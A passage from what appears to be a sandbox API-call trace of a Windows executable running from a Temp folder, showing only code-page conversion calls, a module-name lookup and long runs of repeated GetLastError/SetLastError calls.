¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0095.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x91\xfd\xfd\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0095.300] GetLastError () returned 0x6 [0095.300] SetLastError (dwErrCode=0x6) [0095.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0095.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ") returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0095.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x91\xfd\xfd\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0095.300] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.300] SetLastError (dwErrCode=0x0) [0095.300] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.301] GetLastError () returned 0x0 [0095.301] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.302] SetLastError (dwErrCode=0x0) [0095.302] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.303] SetLastError (dwErrCode=0x0) [0095.303] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.304] SetLastError (dwErrCode=0x0) [0095.304] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.305] SetLastError (dwErrCode=0x0) [0095.305] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.306] GetLastError () returned 0x0 [0095.306] SetLastError (dwErrCode=0x0) [0095.307] GetLastError () returned 0x0 [0095.307] SetLastError (dwErrCode=0x0) [0095.307] GetLastError () returned 0x0 [0095.307] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.566] SetLastError (dwErrCode=0x0) [0095.566] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.567] SetLastError (dwErrCode=0x0) [0095.567] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.568] SetLastError (dwErrCode=0x0) [0095.568] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.569] SetLastError (dwErrCode=0x0) [0095.569] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.570] GetLastError () returned 0x0 [0095.570] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.571] SetLastError (dwErrCode=0x0) [0095.571] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 [0095.572] SetLastError (dwErrCode=0x0) [0095.572] GetLastError () returned 0x0 